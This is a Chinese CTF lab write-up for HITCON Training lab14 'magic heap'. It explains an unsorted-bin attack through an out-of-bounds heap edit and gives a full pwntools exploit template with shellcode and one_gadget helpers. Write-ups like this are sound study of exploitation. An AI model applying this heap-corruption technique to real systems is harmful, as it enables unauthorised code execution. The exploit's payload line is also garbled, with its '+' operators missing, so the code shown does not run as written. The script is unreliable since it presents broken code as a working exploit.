HITCON Training lab14 magic heap
程序分析
在IDA中分析程序中只有create、edit、free三个功能
其中edit功能可以越界写
存在system("cat flag")函数,且当控制 v3 为 4869同时控制 magic 大于 4869,就可以得到 flag 了
利用思路
首先free掉一块0x80的堆块到unsortedbin
之后我们通过edit功能的越界写漏洞接触chunk_0来修改已经被free掉的chunk_1
使其bk指针指向magic-0x10的地址
最后当我们再次create申请一个0x80堆块的时候。magic的地址上便会写入main_arena 88的地址
而这便已经大于了4869。
EXP
代码语言:javascript复制#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
# @偏有宸机_Exploit-Template
# Exploiting: python exploit.py [Exploit_Template]
# - python exploit.py [IP PORT] [Exploit_Template]
# Edit values:
# - RemPro()
# - elf_addr
# - libc_addr
# - enable_Onegadgets
# - exp()
import os
import sys
from pwn import *
from one_gadget import generate_one_gadget
# context.terminal = ["tmux","splitw","-h"]
context.terminal = ["tmux","new-window"]
# context.log_level = "debug"
### 远程本地连接
def RemPro(ip='',port=''):
global sh,elf,libc,one_ggs
elf_addr = "./magic_heap" # 本地ELF
libc_addr = "/lib/x86_64-linux-gnu/libc.so.6" # Libc文件
pro_libc = ""
if len(sys.argv) > 2 :
sh = remote(sys.argv[1],sys.argv[2])
try:
libc = ELF(pro_libc)
libc_addr = pro_libc
except:
log.info("No set Remote_libc...")
libc = ELF(libc_addr)
else:
libc = ELF(libc_addr)
try:
sh = remote(ip,port)
if pro_libc != "":
libc = ELF(pro_libc)
libc_addr = pro_libc
except:
sh = process(elf_addr)
# one_ggs = [283258, 983908, 987655]
# one_ggs = one_gadget(libc_addr)
elf = ELF(elf_addr)
return 1
### 调试用
def debug(cmd=""):
if len(sys.argv) <= 2:
log.progress("Loading Debug....")
gdb.attach(sh,cmd)
### Shell_code
def shell_code(fw):
if fw == 32:
return asm(shellcraft.sh())
elif fw == 64:
return asm(shellcraft.amd64.linux.sh())
### One_Gadget
def one_gadget(libc_addr):
log.progress("Leak One_Gadgets...")
path_to_libc=libc_addr
gadget =[]
for offset in generate_one_gadget(path_to_libc):
gadget.append(int(offset))
return gadget
#one_gg = one_gadget("/lib/x86_64-linux-gnu/libc.so.6")
def exp():
def add(size,content):
sh.sendlineafter("choice :","1")
sh.sendlineafter("Heap : ",str(size))
sh.sendlineafter("heap:",content)
def edit(idx,size,content):
sh.sendlineafter("choice :","2")
sh.sendlineafter("Index :",str(idx))
sh.sendlineafter("Heap : ",str(size))
sh.sendlineafter("heap : ",content)
def dele(idx):
sh.sendlineafter("choice :","3")
sh.sendlineafter("Index :",str(idx))
add(0x20,"a"*8)
add(0x80,"b"*8)
add(0x20,"c"*8)
# add(0x80,"d"*8)
dele(1)
magic_addr = 0x6020c0
edit(0,0x20 0x20,"a"*0x20 p64(0x0) p64(0x91) p64(0x123) p64(magic_addr-0x10))
debug()
add(0x80,p64(9999))
sh.recvuntil("choice :")
sh.sendline("4869")
# sh.sendlineafter("choice :","4869")
# debug()
return sh
if __name__=="__main__":
RemPro()
if len(sys.argv) > 3 :
eval(sys.argv[3])()
elif (len(sys.argv)>1 and len(sys.argv)<3):
eval(sys.argv[1])()
else:
exp()
sh.interactive()一眨眼居然2个月没有更新了,生产队的驴都不敢这样歇….惨惨 :-(
